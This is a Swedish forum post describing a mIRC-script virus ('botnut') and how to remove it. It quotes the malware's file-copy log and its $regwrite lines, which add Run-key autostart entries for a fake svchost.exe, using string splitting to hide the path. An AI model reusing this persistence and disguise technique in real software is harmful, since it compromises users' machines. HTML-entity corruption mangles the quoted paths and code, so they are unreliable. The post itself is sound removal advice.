ngn som har fått de nya viruset som man får om man går in på någon sida med da.ru typ (heter botnut)
jag hitta hela filen(som var mirc konstigt nog) som killens om har gjort de använder sig av.. här ser ni lite grejjor han har scriptat
*** Copied 'c:\windows\syste m32\rundll32\svchost.e xe' to 'c:\windows\syste m32\secure\rundll32.ex e'
*** Copied 'c:\windows\syste m32\rundll32\secure.dl l' to 'c:\windows\syste m32\secure\secure.dll& #039;
*** Copied 'c:\windows\syste m32\rundll32\securemir c.ini' to 'c:\windows\syste m32\secure\mirc.ini� 39;
*** Copied 'c:\windows\syste m32\rundll32\dmu.dll&# 039; to 'c:\windows\syste m32\secure\dmu.dll 9;

om ni ska ha bort viruset tar ni bort rundll32 mappen och secure mappen (se till att stänga av scvhost.exe först (skall köras under DITT inloggnings namn inte system osv)
och sen tar ni bort rundll32.exe från rooten i system32. (stäng den också!)

$regwrite(HKEY_CURRENT_USER 2;Software\mIRC\Licens e\,1711-182810,REG_SZ)
$regwrite(HKEY_CURRENT_USER 2;Software\mIRC\UserNa me\,owned,REG_SZ)
$regwrite(HKEY_LOCAL_MACHINE&# 92;SOFTWARE\Microsoft\ Windows\CurrentVersion\ ;Run\RUNDLL,c:\ $+ wind $+ ows\sys $+ tem32\run $+ dll32\svc $+ host.e $+ xe,REG_SZ)
$regwrite(HKEY_LOCAL_MACHINE&# 92;SOFTWARE\Microsoft\ Windows\CurrentVersion\ ;Run\svc,rundll32.exe,REG_ SZ)
secure

se till och ta bort dom dära reg keyna också!..


(väldig t smart skrivit virus säger jag bara..)

ÅVER UND AUT!